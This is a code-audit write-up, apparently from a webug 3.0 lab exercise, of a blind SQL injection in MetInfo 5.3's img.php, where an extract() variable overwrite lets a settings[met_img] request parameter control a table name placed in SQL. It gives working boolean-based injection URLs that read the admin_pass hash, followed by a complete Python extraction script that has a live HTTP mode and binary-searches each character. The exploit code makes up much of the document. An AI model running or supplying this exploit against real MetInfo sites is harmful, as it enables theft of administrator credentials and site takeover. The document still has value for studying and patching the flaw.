PHP code audit: blind SQL injection in MetInfo 5.3
The first question in the webug 3.0 "practical extension" set is the blind injection in MetInfo's img.php.
<?php
# MetInfo Enterprise Content Management System
# Copyright (C) MetInfo Co.,Ltd (http://www.metinfo.cn). All rights reserved.
require_once '../include/common.inc.php';
$mdname = 'img';
$showname = 'showimg';
$dbname = $met_img;              // the table name used below is taken straight from $met_img
$dbname_list = $met_img_list;
$mdmendy = 1;
$imgproduct = 'img';
$class1re = '';
require_once '../include/global/listmod.php';
$img_listnow = $modlistnow;
$img_list_new = $md_list_new;
$img_class_new = $md_class_new;
$img_list_com = $md_list_com;
$img_class_com = $md_class_com;
$img_class = $md_class;
$img_list = $md_list;
require_once '../public/php/imghtml.inc.php';
include template('img');
footer();
# This program is an open source system, commercial use, please consciously to purchase commercial license.
# Copyright (C) MetInfo Co., Ltd. (http://www.metinfo.cn). All rights reserved.
echo $dbname                     // debug output added while auditing, not part of the shipped file
?>
$dbname is assigned directly from $met_img, so if $met_img can be overwritten, the table name img.php hands to the rest of the module is overwritten with it.
Line 4 includes common.inc.php, and later in that file config.inc.php is included. As the name suggests it loads the configuration values into variables, but the $settings array it fills is never initialized first:
/* read configuration data */
$query = "SELECT * FROM $met_config WHERE lang='$lang' or lang='metinfo'";
$result = $db->query($query);
while($list_config = $db->fetch_array($result)){
    if($metinfoadminok) $list_config['value'] = str_replace('"', '&quot;', str_replace("'", '&#39;', $list_config['value']));
    $settings_arr[] = $list_config;
    if($list_config['columnid']){
        $settings[$list_config['name'].'_'.$list_config['columnid']] = $list_config['value'];
    }else{
        $settings[$list_config['name']] = $list_config['value'];
    }
    if($list_config['flashid']){
        $list_config['value'] = explode('|', $list_config['value']);
        $falshval['type'] = $list_config['value'][0];
        $falshval['x'] = $list_config['value'][1];
        $falshval['y'] = $list_config['value'][2];
        $falshval['imgtype'] = $list_config['value'][3];
        $met_flasharray[$list_config['flashid']] = $falshval;
    }
}
@extract($settings);   // every key of $settings becomes a global variable
On top of that it calls extract($settings), which turns every array key into a global variable, the classic variable-overwrite pattern. Because $settings is never reset before the loop appends to it, a settings[...] element supplied in the request survives the loop and is extracted together with the legitimate configuration keys. A request such as
http://localhost/case/?settings[met_img]=met_admin_table or 1=1 --
therefore ends up setting $met_img, and through it $dbname, to a value we control.
In include/global/listmod.php the table-name variables are interpolated straight into the SQL, for example:
$query = "select * from $met_column where module='$search_module' and (classtype=1 or releclass!=0) and lang='$lang' order by no_order ASC,id ASC";
A table name cannot be quoted, so the injected value needs no quotes either: whatever follows the table name is parsed as SQL, and the rest of the original statement is commented out with --. With $dbname under our control this is the statement shape we exploit.
Boolean-based blind SQL injection: constructing a true/false condition
http://localhost/case/?settings[met_img]=met_admin_table where substr(left((admin_pass),32),1,1)=char(56)-- 1
----- returns a blank page
http://localhost/case/?settings[met_img]=met_admin_table where substr(left((admin_pass),32),1,1)=char(55)-- 1
----- returns the case list
char(56) is '8' and char(55) is '7', so the first character of admin_pass is 7. Comparing against char() rather than a quoted literal keeps the whole payload free of quote characters.
left(a,b) takes the first b characters of a; substr(a,b,c) takes c characters of a starting at position b. left(admin_pass,32) pins the comparison to the 32-character hash, and the substr position is then stepped from 1 to 32.
Clearly this tests the characters one at a time, so the sensible next step is a Python script that dumps the password automatically; emmm, my knowledge being limited, I will have to study that for a while.
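The character-by-character oracle above, automated. This is an added example written for this write-up, not MetInfo code and not the post author's script. It assumes the target URL http://localhost/case/ from the post, that a rendered case list (as opposed to a blank page) marks a true condition, detected here through an assumed TRUE_MARKER string, and that admin_pass holds a 32-character MD5 hex digest. It goes one step beyond the post: instead of trying each char() value in turn it wraps the same left()/substr() expression in ascii() and binary-searches the code point, about seven requests per character. make_fake_oracle is a local stand-in that evaluates the conditions the way MySQL would against a constructed hash, so the script runs offline.

```python
"""Boolean-based blind extraction through MetInfo's settings[met_img] sink.

Added example for this write-up; not MetInfo code and not the post author's
script. Assumptions: the target is http://localhost/case/ as in the post, a
true condition renders the case list while a false one renders a blank page,
and admin_pass holds a 32-character MD5 hex digest.
"""
import hashlib
import re
import urllib.parse
import urllib.request

TARGET = "http://localhost/case/"   # assumption: same URL as the post's payloads
TRUE_MARKER = "<title>"              # assumption: a string present only on the non-blank page
MAX_LEN = 32                         # assumption: admin_pass is an MD5 hex digest


def build_url(condition: str, target: str = TARGET) -> str:
    """Put the condition where the post put it: after the table name that lands
    in $dbname, with a trailing '--' that comments out the rest of the query.
    The payload contains no quote characters, so it never depends on a quote
    surviving the request (the post compares with char() for the same reason)."""
    payload = f"met_admin_table where {condition}-- 1"
    return target + "?" + urllib.parse.urlencode({"settings[met_img]": payload})


def http_oracle(condition: str) -> bool:
    """True iff the server rendered the case list, i.e. the condition held."""
    with urllib.request.urlopen(build_url(condition), timeout=10) as resp:
        body = resp.read().decode("utf-8", "replace")
    return TRUE_MARKER in body


def char_condition(pos: int, threshold: int) -> str:
    """Same left()/substr() shape as the post, wrapped in ascii() so a single
    '>' comparison can drive a binary search instead of testing each char()."""
    return f"ascii(substr(left(admin_pass,32),{pos},1))>{threshold}"


def extract_char(pos: int, oracle) -> int:
    """Binary-search the code point at 1-based position pos over 0..127.
    Returns 0 past the end of the string, because MySQL's ascii('') is 0."""
    lo, hi = 0, 127
    while lo < hi:
        mid = (lo + hi) // 2
        if oracle(char_condition(pos, mid)):   # true means code point > mid
            lo = mid + 1
        else:
            hi = mid
    return lo


def extract_admin_pass(oracle, max_len: int = MAX_LEN) -> str:
    """Walk the positions the post stepped by hand, stopping at end of string."""
    chars = []
    for pos in range(1, max_len + 1):
        code = extract_char(pos, oracle)
        if code == 0:
            break
        chars.append(chr(code))
    return "".join(chars)


_COND = re.compile(r"ascii\(substr\(left\(admin_pass,32\),(\d+),1\)\)>(\d+)")


def make_fake_oracle(admin_pass: str):
    """Stand-in for the server so the script runs offline: evaluates the
    condition the way MySQL would against a constructed admin_pass value."""
    def oracle(condition: str) -> bool:
        m = _COND.fullmatch(condition)
        if m is None:
            raise ValueError("unexpected condition: " + condition)
        pos, threshold = int(m.group(1)), int(m.group(2))
        ch = admin_pass[:32][pos - 1:pos]       # left(x,32), then substr(x,pos,1)
        return (ord(ch) if ch else 0) > threshold
    return oracle


# Constructed sample: the MD5 of a throwaway password, standing in for admin_pass.
FAKE_HASH = hashlib.md5(b"example-password").hexdigest()

if __name__ == "__main__":
    # Offline run; swap make_fake_oracle(FAKE_HASH) for http_oracle against a live target.
    print(extract_admin_pass(make_fake_oracle(FAKE_HASH)))
```

Against a live instance, pass http_oracle instead of the fake one and set TRUE_MARKER to a string that appears only when the case list renders. The first character of the post's target came back as char(55), and extract_char(1, ...) returns exactly that code point, 55, for a hash starting with 7; the whole 32-character digest takes roughly 32 × 7 requests rather than up to 32 × 16.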